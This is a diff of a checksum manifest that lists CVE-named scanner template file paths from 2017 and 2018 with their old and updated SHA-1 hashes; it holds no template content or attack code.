+http/cves/2017/CVE-2017-12794.yaml:c56afff76e73c7654ea22b8a35d2b410d92bccc6 +http/cves/2017/CVE-2017-14135.yaml:510f2f619a872f6a885dda7291a4d923ff185753 +http/cves/2017/CVE-2017-14186.yaml:8b9c2e8b1df76fe3d4d39ebc0d9cb11c669ddb62 +http/cves/2017/CVE-2017-14524.yaml:40770e458708602b1efdb5b38b10272db1d4423b +http/cves/2017/CVE-2017-14535.yaml:36184e53e63918cccb1dc69c16eb38358180f971 http/cves/2017/CVE-2017-14537.yaml:b63bf53960d40b3f5711d611754cb9a86ee8c053 -http/cves/2017/CVE-2017-14622.yaml:eb5b0b5643d963dc7d8d48e3eb928ba7c46c31a4 -http/cves/2017/CVE-2017-14651.yaml:3bbb9436f3323be25dcb01b3b5157828bfcacfdc -http/cves/2017/CVE-2017-14849.yaml:b0590b97b7773681e21e4286050705c3003a1305 +http/cves/2017/CVE-2017-14622.yaml:5ffbed6d0ec83209380bb7e610c118f762b182df +http/cves/2017/CVE-2017-14651.yaml:e8adee45b732510acc3690917813717fb892a10b +http/cves/2017/CVE-2017-14849.yaml:853c08fbe5c5e6c85de61301449553acbad6f05b http/cves/2017/CVE-2017-15287.yaml:6000296cdf09698cffa12c51e003822697406662 http/cves/2017/CVE-2017-15363.yaml:1ff2f8921e452c8a14847f6dee1c5340ce2e4e49 http/cves/2017/CVE-2017-15647.yaml:f63b7309ad40a6ccf4c6af1f518e911416eb2ec3 -http/cves/2017/CVE-2017-15715.yaml:27f869507d13b8dedc776c4fb9c4063c8dd73c3d -http/cves/2017/CVE-2017-15944.yaml:0dbecebb30affc23bec8b2a1193ffc5cb92ed3b3 -http/cves/2017/CVE-2017-16806.yaml:01a0fb38f29898ae3ee66414fd284d286c8af403 -http/cves/2017/CVE-2017-16877.yaml:a5759ca704cd8d23987d433fa76c18a18424220a +http/cves/2017/CVE-2017-15715.yaml:8ebe5ef421beb30836ce4b73a7ced652174e7d7c +http/cves/2017/CVE-2017-15944.yaml:8bc2112905b54238725ec0d269e8b1f2d539cd89 +http/cves/2017/CVE-2017-16806.yaml:5a788972a7ebb5bfdda60837c9543ff996c9e9fb +http/cves/2017/CVE-2017-16877.yaml:647f32ff1ece73be040cec73060694e9cccbf8e4 http/cves/2017/CVE-2017-16894.yaml:cc779a98a64aa8bbeb1694c3f0922a45974063b6 -http/cves/2017/CVE-2017-17043.yaml:d66d885d7578369ae2b82e2e985e722e324dddd9 -http/cves/2017/CVE-2017-17059.yaml:423a292f21591120f88595e2138cab3dc318a902 -http/cves/2017/CVE-2017-17451.yaml:cfdd77524c14ea2d409baea560ea2f0853e6b8a8 -http/cves/2017/CVE-2017-17562.yaml:9547b1a2aad01541a5002fdfe7bc5e9e477e9963 +http/cves/2017/CVE-2017-17043.yaml:1faa4df6f6577cfe32bb09c58fe66b2ef754cba4 +http/cves/2017/CVE-2017-17059.yaml:c892ab75bb1834584b10c435e8ea434a3c8012d6 +http/cves/2017/CVE-2017-17451.yaml:1a8fa69ee3d82c0ac12ad13584c8fb0af61d4957 +http/cves/2017/CVE-2017-17562.yaml:3150e287ce0f8e4f5529a0103844e02be65a5f80 http/cves/2017/CVE-2017-17731.yaml:3f51a3a99f2e8b5bfd36c145bbabaea0607acd75 -http/cves/2017/CVE-2017-17736.yaml:70a8d778dc0695ca6f3e7875e8ca29aabe8eefbc -http/cves/2017/CVE-2017-18024.yaml:7ad02d50552197493d2329d6750671539f097603 -http/cves/2017/CVE-2017-18487.yaml:18c6da8e5ed2e735a102165398d971d35cd96fcb -http/cves/2017/CVE-2017-18490.yaml:aba5f23b2aef25445c641328a6ddc3e987bc8f0e -http/cves/2017/CVE-2017-18491.yaml:87c9b463bdfa96302ff4018e7e55df14a8892a8a -http/cves/2017/CVE-2017-18492.yaml:cf11958620dcfe04715b3e510fec476d0ac23af5 -http/cves/2017/CVE-2017-18493.yaml:6e99015904657d7324ee061d06a4f38938fe5e64 -http/cves/2017/CVE-2017-18494.yaml:a1a215937628bac45037637e3b56de380fe1fc5b -http/cves/2017/CVE-2017-18496.yaml:c918d0780a51c89081a65e495fed915d32c6d989 -http/cves/2017/CVE-2017-18500.yaml:328b89f371566ab0c7cc4ad131bb840605d3a110 -http/cves/2017/CVE-2017-18501.yaml:1963e8addb6e82ca38b406b512a15a4aaad84a09 -http/cves/2017/CVE-2017-18502.yaml:1ab4e124d406d2430332fc28bfb1451170ebd51e -http/cves/2017/CVE-2017-18505.yaml:a1b07dc2eb977736183e951ed2f7dacb8fdc9638 -http/cves/2017/CVE-2017-18516.yaml:cf6a0a1c40c0bfd362bfc15605689f155be88305 -http/cves/2017/CVE-2017-18517.yaml:c7144d2eb0744b8ec32b547c3e2f42de76396ad2 -http/cves/2017/CVE-2017-18518.yaml:b993c19050e2224a427f62975d0428f1e1a93909 -http/cves/2017/CVE-2017-18527.yaml:4381542ae3dda5483088fe923f8c4ccddc4110e0 -http/cves/2017/CVE-2017-18528.yaml:d3c1ed61c27edf32241fe9dbea66b001054f184a -http/cves/2017/CVE-2017-18529.yaml:815c2dac5e98cc90c59c0f44ab02ce6f4af2a698 -http/cves/2017/CVE-2017-18530.yaml:b948f523f2a8f4a2d4ff22f216a6da7a7c14cb5a -http/cves/2017/CVE-2017-18532.yaml:527911bf8931c9cc9a89c6dd47f72e1e917e8d01 -http/cves/2017/CVE-2017-18536.yaml:be20e319ddf44c48e682606863c8bb669169b73b -http/cves/2017/CVE-2017-18537.yaml:323652d96c20ca84bbf364b0c39c489c879a2be9 -http/cves/2017/CVE-2017-18542.yaml:4860bdedb8eef5f2f25a6eb543757f6e081e528b -http/cves/2017/CVE-2017-18556.yaml:0e9aa4dd05abcaa53bd8659715d53e8127a82230 -http/cves/2017/CVE-2017-18557.yaml:8836164173657270b90495bcc3b07b50b3416949 -http/cves/2017/CVE-2017-18558.yaml:9c20a4c29e4af9f616d1cb76b7d71a990bddeff1 -http/cves/2017/CVE-2017-18562.yaml:2b0e335f62ace14516ca1d2b53eabb5e91fb4c4c -http/cves/2017/CVE-2017-18564.yaml:12c5ce5624db3a6ba010aa3ea9ba7c55d53f5ecc -http/cves/2017/CVE-2017-18565.yaml:68a894157caff6326df9bfef799d7d19647ff97d -http/cves/2017/CVE-2017-18566.yaml:28e689c2192d98d78215ef0d9178cd61645644b5 -http/cves/2017/CVE-2017-18598.yaml:741d867d16cacf520035fa44376841fdd2a4181a -http/cves/2017/CVE-2017-18638.yaml:9c3a2bf93f02877b319955bf5112b033815fb876 -http/cves/2017/CVE-2017-3506.yaml:837bfce7c2c79bb9b7598e4c594e44cd0dceec41 -http/cves/2017/CVE-2017-3528.yaml:33a1816704db08e4d524156a6a9c2dd3abd6df92 -http/cves/2017/CVE-2017-4011.yaml:9148db4589b153f37f6a0b1b357f4415564c1ff6 +http/cves/2017/CVE-2017-17736.yaml:fd899ec80278ce3631ef111ab0c616233f1ee315 +http/cves/2017/CVE-2017-18024.yaml:9e42c545d599b03b2602a86a13618441d34bfafb +http/cves/2017/CVE-2017-18487.yaml:f0a246a0a5ef0f05410c7c8537c5610488be7027 +http/cves/2017/CVE-2017-18490.yaml:48455ec9d00dd27c817580bbc9a5e17b6059dccd +http/cves/2017/CVE-2017-18491.yaml:28b658ab3b50b4f490831748f02f282303c7f8ae +http/cves/2017/CVE-2017-18492.yaml:d440d75aee24dc6de7941c745ede9c3470ac1b7f +http/cves/2017/CVE-2017-18493.yaml:c8094504b97edaf846cf1b8f411bb8b2aa1bc23d +http/cves/2017/CVE-2017-18494.yaml:37b04d4b0b9b8bde5573d553447e3e7e341935bb +http/cves/2017/CVE-2017-18496.yaml:1eb967d74ce4d6c33a7d5664fc57e55b29f01186 +http/cves/2017/CVE-2017-18500.yaml:0498aaedc7a59f2c4a1a116dd08ba5f8299de179 +http/cves/2017/CVE-2017-18501.yaml:dab2bb19389acd57d2bd23c9e05f90a2f6341ba6 +http/cves/2017/CVE-2017-18502.yaml:b7b41b4518955c572ff520630bae770a7eab3f96 +http/cves/2017/CVE-2017-18505.yaml:a85b34e55bc6224da1b5952a0ee2a52a99b002b7 +http/cves/2017/CVE-2017-18516.yaml:e10b94be4f71de28574f89312512a969622697ca +http/cves/2017/CVE-2017-18517.yaml:2b5fa1cdd9f2d67e28c275c47cec55af53aa3a94 +http/cves/2017/CVE-2017-18518.yaml:3250e688c4596ee53917d84886bd4a19aed22186 +http/cves/2017/CVE-2017-18527.yaml:778fd4e2ce01c2ac584d34578b4e24a5e11d3966 +http/cves/2017/CVE-2017-18528.yaml:b9f628099df7e0be59b9971727d96ecd8ca7db2c +http/cves/2017/CVE-2017-18529.yaml:b85d0dea7b4251f6f9693aa93cca7d0c6a5e5241 +http/cves/2017/CVE-2017-18530.yaml:c1f6b8f720f547e347c0dc0ba30eb7070e9c9fc5 +http/cves/2017/CVE-2017-18532.yaml:f2250ec678ac6553cd407e7fca7b89d59e6ce9d4 +http/cves/2017/CVE-2017-18536.yaml:41a5883c94c1941dbb3026c74c998dc04d1a601e +http/cves/2017/CVE-2017-18537.yaml:d4dc7eeadee533323c5f3877409ffbdd4929e204 +http/cves/2017/CVE-2017-18542.yaml:4b64131d7f9ec2c0c3159255254158f7228abc49 +http/cves/2017/CVE-2017-18556.yaml:1fe561c24092fbf003ac72967fd8a3084065812b +http/cves/2017/CVE-2017-18557.yaml:d701507eec81973f152631361febf59ec56d1a6b +http/cves/2017/CVE-2017-18558.yaml:b7230400233b64080754dd6e80658b0852231b4d +http/cves/2017/CVE-2017-18562.yaml:afd3097c8776a794b43b5a52d88a664425764f36 +http/cves/2017/CVE-2017-18564.yaml:74ab76cdcf46659cca6c1ea77cb9213ba01e51c2 +http/cves/2017/CVE-2017-18565.yaml:d64b8f0a6479f9868d0909ca3dd47aba11df865a +http/cves/2017/CVE-2017-18566.yaml:54fd16f9c7f113b4722d0ab7f08cc01e5ab0a00b +http/cves/2017/CVE-2017-18598.yaml:719fce236cacd3acd5ff5821908da70fff098592 +http/cves/2017/CVE-2017-18638.yaml:5e91379f58e5c4cda0e0863aadc67c71a96d6559 +http/cves/2017/CVE-2017-3506.yaml:12b9bc3a81b1c55c622b03b41e274bb582208b19 +http/cves/2017/CVE-2017-3528.yaml:ec01ac21133968ed4d05e0535b7badae0939dc19 +http/cves/2017/CVE-2017-4011.yaml:f8387b349e05c712d5e9c5ccfeaf56a80317c75a http/cves/2017/CVE-2017-5521.yaml:441d7bb12801dc564993e7673c6c9c31ab43f79c -http/cves/2017/CVE-2017-5631.yaml:1f75e71390098a2b178d30761f6527297ecce195 -http/cves/2017/CVE-2017-5638.yaml:f20f009e50a91ed6246b1ad844e8e0271cc31587 -http/cves/2017/CVE-2017-5689.yaml:3d378636d73676ad81608d04a18ae472cfb7f122 +http/cves/2017/CVE-2017-5631.yaml:64149ea9528e6a81bcde94ef088db0d5f13b7c2d +http/cves/2017/CVE-2017-5638.yaml:cd89c603ba617db8c5a9471832b727471ce1ae6c +http/cves/2017/CVE-2017-5689.yaml:1be0f56b52c9b826d89b2bd7cf1ad720e7184961 http/cves/2017/CVE-2017-5982.yaml:2cc9e80970cd0d0f3fddf4e79b615e8f80f945be -http/cves/2017/CVE-2017-6090.yaml:d2183a769b5e19fad263ff1676513f9e07acfa87 -http/cves/2017/CVE-2017-7269.yaml:05bdd55c99449dc10ce011f6cf0af28e32fdf894 -http/cves/2017/CVE-2017-7391.yaml:4646b749c40f4cc3537b3209b2b12dfdc5815f5c -http/cves/2017/CVE-2017-7615.yaml:0170f8be9ad3a523febbf30981796d08e3acb2b0 -http/cves/2017/CVE-2017-7855.yaml:fba622d2ce8474a21e56e12b00bdf6272866cf9e -http/cves/2017/CVE-2017-7921.yaml:288e08111c5be77443c8a2f8fe38664718bd35d8 -http/cves/2017/CVE-2017-7925.yaml:df55d9a466ec0d118376375b8d24822dc201aae4 +http/cves/2017/CVE-2017-6090.yaml:8a13b4efc5f9804693c2683423421735b2de3667 +http/cves/2017/CVE-2017-7269.yaml:f16a7101c1403bd7557b170c713670c640a55c52 +http/cves/2017/CVE-2017-7391.yaml:db61bf2e66f06a7be89057d22daa11bdbfcb1d72 +http/cves/2017/CVE-2017-7615.yaml:82207da904d8e6f360a196d837d2a064b563fefb +http/cves/2017/CVE-2017-7855.yaml:033912cd7c7c8811ce7df75b334efcfed008d425 +http/cves/2017/CVE-2017-7921.yaml:b64dd053472ec2eb04035ea846e3beeb6db8674c +http/cves/2017/CVE-2017-7925.yaml:6924f88514cb1e461f2fd1ea7f5baa463576afbb http/cves/2017/CVE-2017-8229.yaml:5904f7e455bf3a8b4fdc772fb95abc1429f1ab66 -http/cves/2017/CVE-2017-8917.yaml:18eb560c3ae4a68bfb37e8e314b93ca835523ccc -http/cves/2017/CVE-2017-9140.yaml:185afc688b01aaa345e8891bfb89303663d71e13 +http/cves/2017/CVE-2017-8917.yaml:b988125caf0c36d19d3e519d9935d5cf1bb8851e +http/cves/2017/CVE-2017-9140.yaml:20a875398f9abd82dd93831499d71542c3a4306b http/cves/2017/CVE-2017-9288.yaml:f8dedeb9681681df484b827a5b6202feb453f565 -http/cves/2017/CVE-2017-9416.yaml:db3a9e47909c6f2171b1e6ace465413df850e426 -http/cves/2017/CVE-2017-9506.yaml:6d296062b2c0a14857813ac8db198c208fc16c12 -http/cves/2017/CVE-2017-9791.yaml:14d06a00a2028cd5e48c65d7cbb5cd3a51399910 -http/cves/2017/CVE-2017-9805.yaml:81c3794f70f5ec9e768e11d5db0fa414b0732043 -http/cves/2017/CVE-2017-9822.yaml:c75acad11d35633968cb7f334420707edb941c1a -http/cves/2017/CVE-2017-9833.yaml:9aba0bb0c7751c252e7bf7ea5fd2e7ee78ddb555 +http/cves/2017/CVE-2017-9416.yaml:f8529409df5526dc064d44d038e7587240188912 +http/cves/2017/CVE-2017-9506.yaml:680ead22bf5a92cfe1a6a558a18d00bd2bf4f81a +http/cves/2017/CVE-2017-9791.yaml:5687baa275538df48a4ba17fcd6482a5ec914276 +http/cves/2017/CVE-2017-9805.yaml:3641fe41a685af3dc8e80a4b6152209af80d65a2 +http/cves/2017/CVE-2017-9822.yaml:b7cd7ac9df9f7255d7623587b44929abbfe234ad +http/cves/2017/CVE-2017-9833.yaml:9d5d145ac854cc5f768170b710d4fb541eb2d6df http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a -http/cves/2018/CVE-2018-0127.yaml:0f92834c92edc1e4e6fb9f1c0de00ede97dc410f +http/cves/2018/CVE-2018-0127.yaml:9039cbd429767ba7737efdc2496732175ed41e85 http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c -http/cves/2018/CVE-2018-1000129.yaml:61c2fdfd04f6c32faad5ebd2e7aa4d4c324a59ee -http/cves/2018/CVE-2018-1000130.yaml:f438d5219e7182e5013ca0f3fb3cd42011642ae9 -http/cves/2018/CVE-2018-1000226.yaml:441edaab2341a22ae577dbd23ae9468d5a73ffa4 -http/cves/2018/CVE-2018-1000533.yaml:948a6a9de7072936bbca5c7d7388c91ef52bc4d3 +http/cves/2018/CVE-2018-1000129.yaml:7997bbbbf18a5581821e4a53d8efcd0681b6fda5 +http/cves/2018/CVE-2018-1000130.yaml:3919e5d1cc90c92b31671f67da4aaa0b9d15cae9 +http/cves/2018/CVE-2018-1000226.yaml:592bafff575e1244e6e273d44450343ae45bbaf6 +http/cves/2018/CVE-2018-1000533.yaml:b92b15bce22e0a205905d8eb8422d3156f08a00e http/cves/2018/CVE-2018-1000600.yaml:910c040b7e95fb65e496c661906baaf38381897a -http/cves/2018/CVE-2018-1000671.yaml:8d16d19b0cc9c32fb10b68f382e9da526e243533 -http/cves/2018/CVE-2018-1000856.yaml:1bd6db921f03613d4e0f5f1b74341cb229675d76 -http/cves/2018/CVE-2018-1000861.yaml:19d67582d28f6a4ab97c800961d4b69d1c13c958 +http/cves/2018/CVE-2018-1000671.yaml:8bf68889af5f3b1d98e20d8f9360522d4b641632 +http/cves/2018/CVE-2018-1000856.yaml:2aebd84fe344186cc05409d5953ee81536be3052 +http/cves/2018/CVE-2018-1000861.yaml:fa2f03128f84ff07428793f51a354d890d7eab02 http/cves/2018/CVE-2018-10093.yaml:c9b9167e15f9893649b46486f1cd02ddbadcf6af http/cves/2018/CVE-2018-10095.yaml:b575dc701664434c37703e8ecd03ad7b09e924d8 -http/cves/2018/CVE-2018-10141.yaml:660c2a25c83aafda43e6bce0992cc916a0108db7 +http/cves/2018/CVE-2018-10141.yaml:91f177c2d445f0ce201654d12ef844433cabff9b http/cves/2018/CVE-2018-10201.yaml:e3825699cee6c241f0a763a3d9d3eb0c07723d9c -http/cves/2018/CVE-2018-10230.yaml:605cf859fd96ff7e9df95aa31ea7037f31f4534c -http/cves/2018/CVE-2018-10562.yaml:0f2de60fa8395472e584d1731c0e94482f070ff2 -http/cves/2018/CVE-2018-10735.yaml:7ae8a70c70fc84d480e2a84dd90da750053a6252 -http/cves/2018/CVE-2018-10736.yaml:4539e3b3bc9c95fec713e4473dcd9706839a84fb -http/cves/2018/CVE-2018-10737.yaml:60b40993477e1edd14ed412903f9fad6a97ff5d0 -http/cves/2018/CVE-2018-10738.yaml:b6927d277dea39fb3a3af753bea42b23d769f34a +http/cves/2018/CVE-2018-10230.yaml:eee748e919425ece39ce03c57745d4af3a7c2d81 +http/cves/2018/CVE-2018-10562.yaml:990e4f11aa8b166e606a477f9913e2da7921179f +http/cves/2018/CVE-2018-10735.yaml:b005790374cbe4515b8e3b8a1a6ec017f2e7a949 +http/cves/2018/CVE-2018-10736.yaml:a0240c5691781a413d3e6c0cd04be99f0b29fb42 +http/cves/2018/CVE-2018-10737.yaml:71987c9f6bea240300b20e7c0d42fbb6abcdee7b +http/cves/2018/CVE-2018-10738.yaml:a129143d1e25d813e6a8ed5af3a9512672e42285 http/cves/2018/CVE-2018-10818.yaml:efa3271174cdf4babcac2932f09ca4d5e35b49d2 http/cves/2018/CVE-2018-10822.yaml:7f0a230ae784c9666bb8be847c4b06e77ecf6a28 -http/cves/2018/CVE-2018-10823.yaml:e56ee0f2e55b63e521584879d4b3323de92515af -http/cves/2018/CVE-2018-10942.yaml:94d0ecb193f659447722f98f25a13f0a514e2bb4 -http/cves/2018/CVE-2018-10956.yaml:239655fecf2e6394829d36f8d14c29ca20f80c43 -http/cves/2018/CVE-2018-11227.yaml:6479757ec8c8091338264768aab66c062db6aac6 +http/cves/2018/CVE-2018-10823.yaml:a5d4167b803821e0149da4c0ef358976f59ab9a0 +http/cves/2018/CVE-2018-10942.yaml:58ba5b471d4abde0425163b67eaed37bfe6a57c4 +http/cves/2018/CVE-2018-10956.yaml:1204c261608d7354d999fad8912c779e0de3dfb0 +http/cves/2018/CVE-2018-11227.yaml:53df328cd18067c2bfc7a54db4c082c74c882368 http/cves/2018/CVE-2018-11231.yaml:51626c805600f217d4c3eb66418488e1e9b39398 -http/cves/2018/CVE-2018-11409.yaml:6a4092b60a8e09019a0b5c8d263ad8a26f3631dd -http/cves/2018/CVE-2018-11473.yaml:69638aa8a17e8bf9285d88ec0100bd69c36987a6 -http/cves/2018/CVE-2018-11709.yaml:41665abe4890a3b6a73e6019aa9caa22364280ad -http/cves/2018/CVE-2018-11759.yaml:3a5574ca3617542788df6812fb710bbf37cfc098 -http/cves/2018/CVE-2018-11776.yaml:be84324e3b216b65994af263fe66173838e1f212 -http/cves/2018/CVE-2018-11784.yaml:f978f633c1ace52039333d342a53302e110e183a -http/cves/2018/CVE-2018-12031.yaml:535cbea2cfbdae172d980a0433cb660415257246 +http/cves/2018/CVE-2018-11409.yaml:c6091a66c75ccc17eb0ac5f6522d4e71d60475bb +http/cves/2018/CVE-2018-11473.yaml:d9d4a345254b353f60f767a76a59fa107d608d78 +http/cves/2018/CVE-2018-11709.yaml:2182a3c38d7b41f6b6b36a9722623d47260d55c7 +http/cves/2018/CVE-2018-11759.yaml:1f4f6fcbda8ca7a79b5fa2820e2d88d02cf5af01 +http/cves/2018/CVE-2018-11776.yaml:c278de7c331f4d1eb567a55328406cb13e2ab8fc +http/cves/2018/CVE-2018-11784.yaml:46298721157a5d14a61de9549884cefb5ba79e51 +http/cves/2018/CVE-2018-12031.yaml:4779e625bb9ad13c228b5b2dff9d04338aea3aed http/cves/2018/CVE-2018-12054.yaml:4bd015a55fedc7b0cf898eaf9a3049aad883ac05 http/cves/2018/CVE-2018-1207.yaml:d725ed522674e6fe25fe4a413ecba7fe32a1b864 http/cves/2018/CVE-2018-12095.yaml:7c6d4a16cc5c42673c2f23abb768466b6164d306 -http/cves/2018/CVE-2018-12296.yaml:8624bcc28a481bf2535cc047138dbf99a97059ea -http/cves/2018/CVE-2018-12300.yaml:99e1abfc6ea6de4f0699fab1122ff20851681934 -http/cves/2018/CVE-2018-12613.yaml:7fe270962d84ef0e3b411c4c4b5ba4f1aa1a1a5c -http/cves/2018/CVE-2018-12634.yaml:dd631be288be4040ece786fb77e56f085f4359fd -http/cves/2018/CVE-2018-12675.yaml:2b74ddc9e7457002f67d3a52276d1e18b2611ff7 -http/cves/2018/CVE-2018-1271.yaml:def7079fda8992783a771bb074e292b823f826c8 +http/cves/2018/CVE-2018-12296.yaml:fefd3f45861158f5911f0b1d6f5d2df379036bf5 +http/cves/2018/CVE-2018-12300.yaml:4283bdec4127f673c9c0329179a3a915fc902327 +http/cves/2018/CVE-2018-12613.yaml:b7d57877bb9e0fd8fac55ee38fe0c6c7cc70dc26 +http/cves/2018/CVE-2018-12634.yaml:1cb589cfbe1c1461e84b764f5c4edfa93bb04456 +http/cves/2018/CVE-2018-12675.yaml:1019e2a9376f55ef9d0bdf1cedc261fd161623b6 +http/cves/2018/CVE-2018-1271.yaml:99a76e403443736e179bba2bd58ad87e6e8d556e http/cves/2018/CVE-2018-1273.yaml:51f89909ec1b94e979c85d95d7bdc5797fbf8606 http/cves/2018/CVE-2018-12909.yaml:e3190dfe0c8354393d283dc3bbe60b472953e024 http/cves/2018/CVE-2018-12998.yaml:47f498dbb37559c753c8fac62600c63ff9a9c791 -http/cves/2018/CVE-2018-1335.yaml:603d12a7eb5a2415e5d67e27eb4299722131310e -http/cves/2018/CVE-2018-13379.yaml:f4abeb12dd4cc5a62fbb1a6cea10090e265f2fb2 -http/cves/2018/CVE-2018-13380.yaml:8734feef8b6a70208db1067f8b6cd9a7f3db74dc -http/cves/2018/CVE-2018-13980.yaml:7d2ea83edff58f4023bfc2103a74e1fcecb6540e -http/cves/2018/CVE-2018-14013.yaml:2193441a1af6243edc682037946f8d4ce4ce400c +http/cves/2018/CVE-2018-1335.yaml:fc3469df3a3c51ef4f52a76101fbbc68697c4778 +http/cves/2018/CVE-2018-13379.yaml:b1585abae2672f5cbe06b756af3683663bda0ced +http/cves/2018/CVE-2018-13380.yaml:a724fe8544d6bd1880b43ee9d9e322ab142df429 +http/cves/2018/CVE-2018-13980.yaml:6eb4159b100f832aecbabfb6cef291ef5a910cbf +http/cves/2018/CVE-2018-14013.yaml:18f62843d79c16e941804e7e9c63efd13dbf3148 http/cves/2018/CVE-2018-14064.yaml:cccc793c46719cb2a7e81374f651331c60a7890b -http/cves/2018/CVE-2018-14474.yaml:1a6a7c21e82b7d962e5394b5bfa2582ff74885d0 -http/cves/2018/CVE-2018-14574.yaml:d93505082cac96cda4c20d151d07985e81e550b4 +http/cves/2018/CVE-2018-14474.yaml:14147a463e7df9164542239aab9693365cc552d3 +http/cves/2018/CVE-2018-14574.yaml:08cc9b9112b8242b5ed426aa9a016ffaee8351fa http/cves/2018/CVE-2018-14728.yaml:3005fff6268e3e0079028fc907bcad293f3d69fa -http/cves/2018/CVE-2018-14912.yaml:2e747fd7af4ad0250013a6a968dc2409c9eb5beb -http/cves/2018/CVE-2018-14916.yaml:99366bc99fc0a290c76a8719866cd70af5132ffd -http/cves/2018/CVE-2018-14918.yaml:3337bed476d83b757d2a50868709dfb6d4265730 -http/cves/2018/CVE-2018-14931.yaml:aec3137733c19a46022e5e0158bfe0e57270a3fd +http/cves/2018/CVE-2018-14912.yaml:8637942f6d1cad678d3efcd0fdfbb07cfd5915e7 +http/cves/2018/CVE-2018-14916.yaml:e395335963bef34ab111725bb0d36d5a69f06780 +http/cves/2018/CVE-2018-14918.yaml:e536408e3be762c36ce321b5ee381e7914ba27c0 +http/cves/2018/CVE-2018-14931.yaml:faa048b946e4befdd3f55328fe9a3d1218ffe567 http/cves/2018/CVE-2018-15138.yaml:73e253bb1cb6ea31e6a7e7be8c2486bf196671b2 -http/cves/2018/CVE-2018-15517.yaml:23862903157263d68ee6212e53179f5172736730 -http/cves/2018/CVE-2018-15535.yaml:761f13a32b66cba3c805330fda03b152b374b2e0 -http/cves/2018/CVE-2018-15745.yaml:2893ecc4d1961e2138fe090242ff7e3b54951472 -http/cves/2018/CVE-2018-15917.yaml:83c37ef685d12355a32e18120c9ec156909926f9 -http/cves/2018/CVE-2018-15961.yaml:4def13527ee22108d3eb74d5e1eb9399a0140e42 +http/cves/2018/CVE-2018-15517.yaml:12e36b24ee809c6e164212d693481a55f58b1130 +http/cves/2018/CVE-2018-15535.yaml:bfad4720c9ee69d05e8103533e4f856185d62e66 +http/cves/2018/CVE-2018-15745.yaml:448c292479d27f7426b8d45acb2dc8c24dac1ba8 +http/cves/2018/CVE-2018-15917.yaml:f258bab15a5870a96fc436a01da75ad080807eff +http/cves/2018/CVE-2018-15961.yaml:7002b2506196a153ea386aee2db06f292f5039c1 http/cves/2018/CVE-2018-16059.yaml:992cc116f8f261abd69f4cb5b9934ce00d83e8e0 http/cves/2018/CVE-2018-16133.yaml:c01d3089c2ebbe72dfe0e54eb3e5c8626e19d362 -http/cves/2018/CVE-2018-16139.yaml:e847bfca654dd23d574dbfe531b0a691cdcf56f6 -http/cves/2018/CVE-2018-16159.yaml:5b61de6617d5074efccf89df22d81ae7c7c8105f -http/cves/2018/CVE-2018-16167.yaml:f66679c3b289f3e28320055463f4f716317a2c1d -http/cves/2018/CVE-2018-16283.yaml:8a7a91b6b81b9d73042d3199b76a96d594fab657 -http/cves/2018/CVE-2018-16288.yaml:ef5d6815cfe1919acf321f56af943934b95c1baa +http/cves/2018/CVE-2018-16139.yaml:39168cb9083770d3cbddfa4139e0b4cdf61c5247 +http/cves/2018/CVE-2018-16159.yaml:327d838cb702706b8d0d51ac27e8bfe157585a4d +http/cves/2018/CVE-2018-16167.yaml:176a380e5945ac18fc326e04621f5d433fa876a6 +http/cves/2018/CVE-2018-16283.yaml:cd7733e319cc2abbe92fcc06861eed211c030486 +http/cves/2018/CVE-2018-16288.yaml:28a0c7098ffd27a2ab982d73c4f5b71abd27f539 http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a http/cves/2018/CVE-2018-16671.yaml:906368ef356b2b4c8965f8046fd49dbef0dd821f -http/cves/2018/CVE-2018-16716.yaml:c4e7b7d3daee903a199b68d440c6e41525746037 -http/cves/2018/CVE-2018-16761.yaml:4a6d90b317f11da3befdef5b89e497ce7876426b -http/cves/2018/CVE-2018-16763.yaml:f29c6f637d2868e53c10e7c2522b36b40842b00e -http/cves/2018/CVE-2018-16836.yaml:ceafe25bf42e256f10b38e6151c2c7a764259fa5 -http/cves/2018/CVE-2018-16979.yaml:0ecee03cdd86c219e76cfaeff5740908f61b5b4c -http/cves/2018/CVE-2018-17153.yaml:fed4c12e76a4a9c36932f7ca3effaeec9563db62 -http/cves/2018/CVE-2018-17246.yaml:5ebc30e64db945afbd0db95bf9bf73059e81752a -http/cves/2018/CVE-2018-17254.yaml:61a5b750c1409ce5d1b79c8859212fd4bcac1467 -http/cves/2018/CVE-2018-17422.yaml:2f9d775f67d43eecf8d145ffd01aed37075356bc +http/cves/2018/CVE-2018-16716.yaml:18f0e3db7969f3773f0483a9d82b30dc976e5459 +http/cves/2018/CVE-2018-16761.yaml:f1474b4667b0466f717c893ffefbe0d57cf7f2e9 +http/cves/2018/CVE-2018-16763.yaml:ce08c6c034ceb06230c74368d4845570ae25736f +http/cves/2018/CVE-2018-16836.yaml:61541c4720d4fdd223e9141ae08a48bbc0b2adce +http/cves/2018/CVE-2018-16979.yaml:ac6f5cfd3090ba52cea4db62eb8719cbff2b0558 +http/cves/2018/CVE-2018-17153.yaml:5cdbe44c616d3ea36184bee2460031b569d362a0 +http/cves/2018/CVE-2018-17246.yaml:fe7a3e41ef31e8f761f3df652a564aae3997bbd6 +http/cves/2018/CVE-2018-17254.yaml:63a99c6884bcb88c9d81a6d95136c007f8296cf6 +http/cves/2018/CVE-2018-17422.yaml:879432940fa30bcbd2cb3744cf063234690fbe74 http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 http/cves/2018/CVE-2018-18069.yaml:fb55c1c8a6544261d3da494f50ffe75d12262d5c -http/cves/2018/CVE-2018-18264.yaml:e49855501e1ea92e2e18f03868942e2be2075e2c -http/cves/2018/CVE-2018-18323.yaml:49ada4a8a0e4a8a1cdc9f8d6fb5a2f3b801c5e14 -http/cves/2018/CVE-2018-18570.yaml:1eeeb647ad50a374103212462630e86944fcc129 -http/cves/2018/CVE-2018-18608.yaml:c9faa9dee45e2512ccbe1891582889f90ab4f752 +http/cves/2018/CVE-2018-18264.yaml:46b468443b1c2d1213ea57b3bc99475259235dfe +http/cves/2018/CVE-2018-18323.yaml:b10bf4b2ae8e13371ebf965fc3483d3d84a40bdd 